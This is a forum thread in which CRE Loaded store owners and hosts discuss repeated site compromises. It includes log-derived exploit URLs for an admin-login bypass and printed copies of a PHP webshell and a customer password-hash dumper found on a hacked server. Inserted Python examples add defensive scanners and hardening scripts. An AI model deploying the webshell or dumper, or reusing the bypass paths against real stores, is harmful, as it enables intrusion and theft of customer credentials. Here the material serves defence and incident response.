CRE Loaded Community

Board index » Loaded Commerce Support » Security Issues

All times are UTC - 5 hours

 Post subject: 6.2 sites getting hacked repeatedly !
PostPosted: Sat Aug 07, 2010 12:48 am 
CRE Newbie

Joined: Tue May 06, 2008 12:10 pm
Posts: 14
Hi,

I am having a serious virus issue with almost all my sites running creloaded 6.2.

They are getting infected repeatedly by some virus. It infects all php pages and in some instances, creates random folders such as :

/catalog/llft/vjw-einz-sszfk.html
/catalog/bxnl/wso-ecry-tplli.html
/catalog/wwsw/ccm-xmat-bficd.html
/catalog/jzlw/hro-ovqi-bqvry.html
/catalog/lxdt/nud-xahn-viojz.html

I have patched up my cart to Patch 14 and have also secured the admin area with a password-protected folder, but the virus comes back after a day.

Has anyone seen this issue before? Can the community help me please? I read all the security threads posted in this forum, but none matches my situation :-(

Please help.

Regards,

fastDNS


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Sat Aug 07, 2010 4:09 pm 
CRE Newbie

Joined: Mon Jul 06, 2009 11:20 am
Posts: 21
I have had a few 6.4 sites hacked lately. My host removed the virus, but I am looking to stop it from happening again. Anyone know if the patches will stop it?

_________________
Paintball Stores


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Tue Aug 31, 2010 6:41 pm 
CRE Freak

Joined: Sat Jan 28, 2006 1:00 am
Posts: 38
My v6.2 B2B[13.1 (SP1)] was also getting hacked. One of the symptoms was that my "Define MainPage" text disappears.

Here is my solution (symptoms follow)

Since all the attacks were via the /admin/ directory, and since I did not have time to patch all the possible files, I have simply restricted access to all /admin/ files to selected IP addresses by adding the following configuration to /admin/.htaccess:

Original end of /admin/.htaccess file:
Code:
<Files .htaccess>
order allow,deny
deny from all
</Files>

Modified end of /admin/.htaccess file:
Code:
<Files .htaccess>
order allow,deny
deny from all
</Files>

#Only users from my IP address, and a colleague
<Limit GET POST PUT>
order deny,allow
deny from all
allow from 11.22.33.44
allow from 123.123.123.123
</Limit>
where the "allow from" IP addresses correspond to your own (and any other authorised) IP addresses. You can check your own IP address at IP Chicken.

Symptoms of the hacks

Here's what I discovered.

My log files showed a number of accesses from the Ukraine (IP=91.211.16.126), showing exploits of one or more of the following:
Code:
/shop/admin/file_manager.php/login.php?action=processuploads
/shop/admin/define_mainpage.php/login.php?lngdir=english&filename=mainpage.php&action=save
/shop/admin/define_language.php/login.php?filename=cookie_usage.php&action=save&language=english
/shop/goog1e_analist_591dcabf272245.php?cookies=1 (not google)
/shop/admin/manufacturers.php/login.php?action=insert
/shop/admin/categories.php/login.php?action=new_product_preview
/shop/includes/languages/english/mainpage.php?cookies=1
/shop/cookie_usage.php?cookies=1&language=english
/shop/images/goog1eb3852156971218.php

Note that some of these do not access the /admin/ directory directly.

I found a number of unauthorized files in my admin/images/ folder, including some beginning with the string "goog1e" (not google), containing the code:
Code:
Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

And also an unauthorized file called mhp.php containing the following code:
Code:
<?php

$p=$_REQUEST['p'];

if (!isset($p) || md5($p)!='c180aaadf5ab10fb3a733f43f3ffc4b3') die ('');

if ($_REQUEST['d'] == '1') unlink($HTTP_SERVER_VARS['SCRIPT_FILENAME']);

echo "#mhpver11"."\n";
//mail hash parser oscommerce
include "../includes/database_tables.php";
include "../includes/configure.php";

$link = mysql_connect(DB_SERVER, DB_SERVER_USERNAME, DB_SERVER_PASSWORD)
        or die("Could not connect");

mysql_select_db(DB_DATABASE);

$result = mysql_query ("SELECT customers_email_address,customers_password FROM ".TABLE_CUSTOMERS);

while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {

   $l = $line['customers_email_address'].":".$line['customers_password'];
   if (preg_match("/:[a-f0-9]{32}:[a-f0-9]{2}/i",$l)) echo $l."\n";
}
?>

The latter seems to acquire your customer passwords (though these should not be stored in your database!).

And finally

On entering the Admin login screen, there are often messages to upgrade to the next version of CRE Loaded. I do not recall ever seeing a note that there is a security patch.
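A defender's way to hunt for the indicators this post lists, as an added example in Python that is not part of the post or of CRE Loaded: it scans constructed Apache access-log lines for the request-path patterns above (an admin script reached through a trailing /login.php path component, PHP executed out of the images directory, and the "goog1e" naming trick) and scans file contents for the traits of the quoted drop-in script (eval/system on request input, move_uploaded_file into a client-supplied file name). The log lines and file bodies are constructed; the webshell sample is a trimmed copy of the fragment quoted above, and the benign files are made up.

```python
import re
from typing import Dict, List

# Constructed Apache combined-format log lines modelled on the request paths
# listed in the post; client addresses and timestamps are made up.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [06/Aug/2010:22:14:03 -0500] "GET /shop/index.php HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Aug/2010:22:14:09 -0500] "POST /shop/admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Aug/2010:22:14:15 -0500] "GET /shop/admin/define_mainpage.php/login.php?lngdir=english&filename=mainpage.php&action=save HTTP/1.1" 200 640 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Aug/2010:22:14:21 -0500] "POST /shop/images/goog1eb3852156971218.php HTTP/1.1" 200 33 "-" "Mozilla/5.0"
198.51.100.4 - - [06/Aug/2010:22:15:00 -0500] "GET /shop/admin/login.php HTTP/1.1" 200 3001 "-" "Mozilla/5.0"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Request-path indicators drawn from the post. A legitimate /admin/login.php
# request does not match the first pattern; only "<script>.php/login.php" does.
LOG_INDICATORS = {
    "admin_path_info_bypass": re.compile(r"/admin/[\w-]+\.php/login\.php"),
    "php_executed_from_images": re.compile(r"/images/[^\s?]+\.php", re.I),
    "goog1e_filename": re.compile(r"goog1e", re.I),
}

# File-content traits of the dropped script quoted in the post.
INPUT_SUPERGLOBAL = re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE|FILES)\b")
DANGEROUS_CALL = re.compile(
    r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(", re.I
)
# move_uploaded_file(<tmp>, $_FILES[...]['name']): destination chosen by the client
UNSAFE_UPLOAD = re.compile(
    r"move_uploaded_file\s*\([^,]+,\s*\$_FILES\[[^\]]+\]\s*\[\s*'name'\s*\]", re.I
)

# Constructed file bodies. The first is a trimmed copy of the fragment quoted
# in the post; the other two stand in for ordinary cart files.
SAMPLE_FILES = {
    "images/goog1eb3852156971218.php":
        "Goog1e_analist_up<?php $e=@$_POST['e'];if($e){eval($e);}"
        "if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>",
    "includes/configure.php":
        "<?php\n  define('HTTP_SERVER', 'http://www.example.com');\n  define('DB_SERVER', 'localhost');\n?>",
    "images/photo_upload.php":
        "<?php\n  // benign uploader: the server picks the destination name\n"
        "  $dest = 'images/' . uniqid() . '.jpg';\n"
        "  move_uploaded_file($_FILES['f']['tmp_name'], $dest);\n?>",
}


def scan_access_log(text: str) -> List[Dict[str, str]]:
    """Return one hit per (line, indicator) for request paths matching an indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        for name, pattern in LOG_INDICATORS.items():
            if pattern.search(m.group("path")):
                hits.append({"indicator": name, "ip": m.group("ip"), "path": m.group("path")})
    return hits


def summarize_by_ip(hits: List[Dict[str, str]]) -> Dict[str, int]:
    """Count indicator hits per client address, to see who to block or investigate."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


def scan_file_content(name: str, content: str) -> List[str]:
    """Return the webshell traits found in one file (empty list means nothing flagged)."""
    findings = []
    if "goog1e" in name.lower():
        findings.append("filename_mimics_google")
    if INPUT_SUPERGLOBAL.search(content) and DANGEROUS_CALL.search(content):
        findings.append("dangerous_call_on_request_input")
    if UNSAFE_UPLOAD.search(content):
        findings.append("unrestricted_upload_to_client_filename")
    return findings


def scan_all(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a name->content mapping and keep only the files with findings."""
    return {n: f for n, c in files.items() if (f := scan_file_content(n, c))}


if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print(hit)
    print(summarize_by_ip(scan_access_log(SAMPLE_ACCESS_LOG)))
    print(scan_all(SAMPLE_FILES))
```

On a real server you would feed scan_access_log the rotated access logs and scan_all a walk over the document root, then compare the flagged files against a clean copy of the cart before deleting anything.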


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Fri Oct 08, 2010 3:29 am 
CRE Newbie

Joined: Fri Oct 08, 2010 3:19 am
Posts: 1
Thanks Ian. Very helpful. I've been hacked about 10 times in 4 months.


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Fri Oct 08, 2010 6:16 am 
CRE Newbie

Joined: Mon Feb 22, 2010 10:24 am
Posts: 31
@fastdns

Make sure malicious files do not remain uploaded under your account. It is very good that you have password-protected the admin directory.

However, you might already have a malicious script uploaded that allows the attacker access to your website. You should make sure all files are clean.

_________________
SiteGround Technical Support Team Member
Check out our special CreLoaded hosting package


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Thu Oct 28, 2010 6:50 pm 
CRE Legend

Joined: Thu Jun 12, 2008 6:39 am
Posts: 2211
Location: New Zealand
iantresman wrote:
#Only users from my IP address, and a colleague
<Limit GET POST PUT>
order deny,allow
deny from all
allow from 11.22.33.44
allow from 123.123.123.123
</Limit>

Don't think that works using <limit> containers... if you want to restrict admin access to certain IP addresses I'd try:

Code:
<FilesMatch ".*">
  Order Deny,Allow
  Deny from all
  allow from 11.22.33.44
  allow from 123.123.123.123
</FilesMatch>


Should also point out that you don't necessarily need all 4 'octets' of the IP address - this is particularly useful to know if you're on a dynamic IP (which a lot of people are). Often ISPs assign a limited range to users which doesn't change that often, and using this example you might be ok to allow from 11.22 or allow from 123.123.

My 5c worth,
Simon

_________________
www.codemehappy.com
For Cre Loaded tips, how-to articles and more
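To see exactly what the shortcut in the post above admits, here is an added Python model of the Apache 2.2 Order/Deny/Allow evaluation (not code from the post or from Apache): a partial address like 11.22 is a leading-octet prefix, so it admits 11.22.0.0/16, i.e. 65,536 addresses rather than one. The ACL blocks below reuse the post's placeholder addresses, and the client addresses tested are made up. (Apache 2.4 replaces these directives with Require ip, which accepts the same partial-address form.)

```python
import ipaddress
from typing import Iterable


def spec_to_network(spec: str) -> ipaddress.IPv4Network:
    """Turn one 'Allow from' / 'Deny from' argument into a network.

    Apache 2.2 mod_authz_host accepts a full dotted address, a CIDR block, or
    a leading partial address such as '11.22', which matches every address
    whose first octets are 11.22 (that is, 11.22.0.0/16).
    """
    if "/" in spec:
        return ipaddress.IPv4Network(spec, strict=False)
    octets = spec.split(".")
    if not 1 <= len(octets) <= 4 or not all(o.isdigit() and int(o) <= 255 for o in octets):
        raise ValueError(f"unsupported address spec: {spec!r}")
    padded = ".".join(octets + ["0"] * (4 - len(octets)))
    return ipaddress.IPv4Network(f"{padded}/{8 * len(octets)}", strict=False)


def matches(client_ip: str, spec: str) -> bool:
    """Does one directive argument ('all', address, prefix or CIDR) cover the client?"""
    if spec.lower() == "all":
        return True
    return ipaddress.IPv4Address(client_ip) in spec_to_network(spec)


def is_allowed(client_ip: str, order: str, deny: Iterable[str], allow: Iterable[str]) -> bool:
    """Apply Apache 2.2 'Order' semantics to a client address."""
    in_deny = any(matches(client_ip, s) for s in deny)
    in_allow = any(matches(client_ip, s) for s in allow)
    key = order.replace(" ", "").lower()
    if key == "deny,allow":
        # Deny directives are evaluated first; a matching Allow overrides them,
        # and a client matching neither is permitted.
        return in_allow or not in_deny
    if key == "allow,deny":
        # Allow directives are evaluated first; a matching Deny overrides them,
        # and a client matching neither is refused.
        return in_allow and not in_deny
    raise ValueError(f"unsupported Order: {order!r}")


def admitted_addresses(spec: str) -> int:
    """How many client addresses a single 'Allow from' argument lets in."""
    return spec_to_network(spec).num_addresses


# The <FilesMatch> block from the post, as data (placeholder addresses kept).
ADMIN_ACL = {"order": "Deny,Allow", "deny": ["all"], "allow": ["11.22.33.44", "123.123.123.123"]}
# The same block using the two-octet shortcut for the dynamic-IP user.
ADMIN_ACL_DYNAMIC = {"order": "Deny,Allow", "deny": ["all"], "allow": ["11.22", "123.123.123.123"]}


def check(acl: dict, client_ip: str) -> bool:
    return is_allowed(client_ip, acl["order"], acl["deny"], acl["allow"])


if __name__ == "__main__":
    for spec in ("11.22.33.44", "11.22.33", "11.22"):
        print(f"allow from {spec:<12} admits {admitted_addresses(spec):>6} addresses")
    print("11.22.200.9 under the shortcut:", check(ADMIN_ACL_DYNAMIC, "11.22.200.9"))
```

The trade-off for a dynamic-IP admin is therefore a /16 or /24 of the ISP's customers, which is still far narrower than the whole internet; pairing the prefix with the existing password prompt on /admin/ keeps the second factor.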


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Sat Oct 30, 2010 4:03 pm 
CRE Expert

Joined: Wed Jul 30, 2003 12:00 am
Posts: 1369
Thanks to those that gave the security tips.

I will have Charles review this thread to ensure we have addressed any exposures.

_________________
Regards,

Salvatore Iozzia
Founder and Chief Visionary Officer (Evil Overlord)
Loaded Commerce | CRE Secure | CRE Hosting

Get PCI Compliant NOW http://www.cresecure.com
follow me on TWITTER! http://www.twitter.com/saliozzia
follow CRE on TWITTER! http://www.twitter.com/crecommerce


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Tue Nov 02, 2010 6:39 pm 
CRE Newbie

Joined: Thu Feb 18, 2010 4:44 pm
Posts: 21
We are also being hacked repeatedly on all sites from 6.2.14 to 6.4. Why doesn't CreLoaded have security measures like the ones in osCommerce?

What can we do aside from blocking IP addresses, modifying the htaccess file and password protecting the admin? We have gotten hacked even when all three of those options have been completed.


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Tue Nov 02, 2010 9:23 pm 
CRE Legend

Joined: Thu Jun 12, 2008 6:39 am
Posts: 2211
Location: New Zealand
slopez wrote:
We are also being hacked repeatedly on all sites from 6.2.14 to 6.4. Why doesn't CreLoaded have security measures like the ones in osCommerce?

What can we do aside from blocking IP addresses, modifying the htaccess file and password protecting the admin? We have gotten hacked even when all three of those options have been completed.

I think a better question is 'why doesn't Cre update its software more frequently?' - given that the last patch was Xmas 2009. A basic (and arguably the most important) security measure is to stay current - upgrade/update to the latest version of the software. If the company can't keep up then your choice is pretty obvious.

However, no cart software is 'hack proof' indefinitely; you just reduce the chance of getting hacked by how you run your store. Also, the hosting company has just as important a role in securing the server - there are many configuration settings that can improve your site's security dramatically.

Are you certain you removed all traces of a hack attempt? Hey, give an example store via pm if you like - I'll check for some obvious flaws and let yer know!

Simon

_________________
www.codemehappy.com
For Cre Loaded tips, how-to articles and more


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Tue Nov 23, 2010 8:46 pm 
CRE Freak

Joined: Thu Oct 02, 2003 12:00 am
Posts: 46
Location: Vegas
This is happening to login.php and languages/***/login.php as well. Those files are just plain disappearing in the free CRE versions, and going blank on the pro versions, and this is WITH a double admin login (.htaccess required login added).

I haven't found the malicious files causing it yet... will post back when I do in case they are out to get anyone else.


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Fri Dec 03, 2010 10:53 am 
CRE Legend

Joined: Sun Nov 09, 2003 1:00 am
Posts: 7258
Location: Baconton, GA USA
The key word in the title of this thread is "sites".

I've cleaned up a number of these sites in the past few years. The log entries mentioned are typical - but have NOT been demonstrably effective in penetrating clean cart setups of the same version yet.

What is pretty consistent is that if caught early, when FTP logs are available, the files in question can be seen to have been uploaded using a valid set of FTP credentials...

_________________
My CRE Loaded FAQ List
CRE Loaded Hosting


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Sat Jan 01, 2011 7:34 pm 
CRE Newbie

Joined: Sat Jan 01, 2011 7:20 pm
Posts: 1
The lack of response by CRE is disturbing. We have had 4 sites hacked and it is not just 6.2.14 ... what's disturbing is the last CRE login was 10/30/2010 and there is not a patch or a fix to be found on the net ... is CRE a shopping cart or a credit card processor? Sometime they have to decide ... the internet has changed so much, but from 1996 to today (original site on Xoom) I cannot find a cart that delivers and, worse, really takes this stuff seriously ... but they are very quick to accept your money and sell you services that are like calling a cable company ....

Sal, you really need to start living up to the narcissistic "visionary" you claim to be. 10/30 and no response does not give the impression that anyone gives a crap.

Leaving CRE


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Thu Mar 24, 2011 2:37 pm 
CRE Talented

Joined: Fri Aug 11, 2006 12:00 am
Posts: 457
Location: Uk & USA
I've just done two days working 19 hours a day to move my site from B2B 6.2 to Community 6.4 in the hope that a hacker will go away.

For over a week one of my sites has been hit with XSS hacks. The solution is easy enough: I just copied over a clean set of files I keep. I did that every few days at the start, but the last attack was within minutes of the clean-up.

Thing is I'm also in the middle of moving the site over to another cart so this is all work that will be lost in a month or so.

_________________
http://www.alternativestoebay.com - Developers & Hosts List Your Services Too !

http://www.WebSiteHandyMan.co.uk - The Helping Hand For DIY Webmasters.


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Wed Apr 06, 2011 1:02 am 
CRE Newbie

Joined: Wed Apr 06, 2011 12:51 am
Posts: 2
Hey guys, one thing I noticed in mine that may or may not help... There is a file being dropped in my main public_html folder called postinfo.php. It was one that continued to add javascript to the site. Check and make sure you don't have it on your server. That wasn't the only problem but definitely one of them.


 Post subject: Re: 6.2 sites getting hacked repeatedly !
PostPosted: Tue Apr 12, 2011 12:14 pm 
CRE Newbie

Joined: Tue Apr 12, 2011 12:07 pm
Posts: 12
I host around 200 CRE Loaded domains and this is a constant issue..

This hack rips your database for users and then sends out emails using the same script.. in some instances the email is for drugs, others are redirects to other trojan-infected sites..

TRULY A PAIN for me in general..

The intrusion comes from one of several places; the most common is the /images folder.. The security issue is that the folder must be set at 777 for image uploads (that are all owned, incidentally, by "nobody"). They force the script uploads, parse your database and then use your account to send tens of thousands of emails..
Any other folder set to 777 is vulnerable without taking specific precautions...

We have been forced to install cronjobs to set folders to 755 and files to 644 in OSCommerce stores (CRE included)

We are forced to "boot" clients that have repeat intrusions as we can not babysit every store ourselves..

For the developers.. Needing folders set at 777 is a real issue for us, as are files on shared servers owned by "nobody"

I make a substantial amount of income fixing these sites (time is not free, sorry to say) but finding my IPs on RBLs is a bigger issue from the spam sent out..
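The cron job this post describes (reset folders to 755 and files to 644) is the kind of thing worth pairing with a check for scripts that have landed in the upload tree. The following is an added Python example, not the poster's job nor CRE Loaded code: it walks a store tree, resets any directory or file that is not at the target mode, skips symlinks so a planted link cannot redirect the chmod elsewhere, and lists PHP-looking files found under the assumed upload directory images/. The store tree it operates on is a constructed fixture built in a temporary directory; the file and directory names in it are made up.

```python
import os
import shutil
import stat
import tempfile
from typing import Dict, List

DIR_MODE = 0o755     # the post's target for directories
FILE_MODE = 0o644    # the post's target for files
UPLOAD_DIRS = {"images"}   # assumption: the only tree the cart needs to be web-writable
SCRIPT_SUFFIXES = (".php", ".phtml", ".php3", ".php4", ".php5", ".phar")


def _is_in_upload_dir(root: str, dirpath: str) -> bool:
    rel = os.path.relpath(dirpath, root)
    return any(part in UPLOAD_DIRS for part in rel.split(os.sep))


def harden_tree(root: str) -> Dict[str, List[str]]:
    """Reset loose permissions under root and list scripts sitting in upload dirs.

    Returns the relative path of every directory and file whose mode was
    changed, plus every script-looking file found under an upload directory.
    The root directory itself is left alone; symlinks are never chmod'ed.
    """
    report: Dict[str, List[str]] = {"fixed_dirs": [], "fixed_files": [], "scripts_in_uploads": []}
    for dirpath, dirnames, filenames in os.walk(root):
        # Fix subdirectories before os.walk descends into them.
        for name in sorted(dirnames):
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            if stat.S_IMODE(os.lstat(path).st_mode) != DIR_MODE:
                os.chmod(path, DIR_MODE)
                report["fixed_dirs"].append(os.path.relpath(path, root))
        in_upload = _is_in_upload_dir(root, dirpath)
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            if os.path.islink(path):
                continue
            rel = os.path.relpath(path, root)
            if stat.S_IMODE(os.lstat(path).st_mode) != FILE_MODE:
                os.chmod(path, FILE_MODE)
                report["fixed_files"].append(rel)
            if in_upload and name.lower().endswith(SCRIPT_SUFFIXES):
                report["scripts_in_uploads"].append(rel)
    return report


def _write(root: str, rel: str, mode: int, body: bytes = b"constructed sample\n") -> None:
    path = os.path.join(root, rel)
    with open(path, "wb") as fh:
        fh.write(body)
    os.chmod(path, mode)


def build_fixture(root: str) -> None:
    """Constructed store tree: a world-writable images/ directory, an
    over-permissive image file, and a PHP file dropped among the images."""
    for name, mode in (("images", 0o777), ("includes", 0o755), ("admin", 0o755)):
        os.mkdir(os.path.join(root, name))
        os.chmod(os.path.join(root, name), mode)
    _write(root, "index.php", 0o644)
    _write(root, "includes/configure.php", 0o644)
    _write(root, "admin/login.php", 0o644)
    _write(root, "images/logo.gif", 0o666)
    _write(root, "images/goog1e_sample.php", 0o644)   # constructed stand-in for a dropped script


def demo() -> Dict[str, object]:
    """Build the fixture, harden it twice, and return the first report plus the
    number of changes the second pass made (a cron rerun should be a no-op)."""
    root = tempfile.mkdtemp(prefix="cre_store_")
    try:
        build_fixture(root)
        first: Dict[str, object] = dict(harden_tree(root))
        second = harden_tree(root)
        first["rerun_changes"] = len(second["fixed_dirs"]) + len(second["fixed_files"])
        return first
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Resetting modes does not remove a script the attacker already placed, which is why the report lists scripts_in_uploads separately: those files need a review against a clean copy of the cart, and the web server should be told not to execute PHP from the images tree at all.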

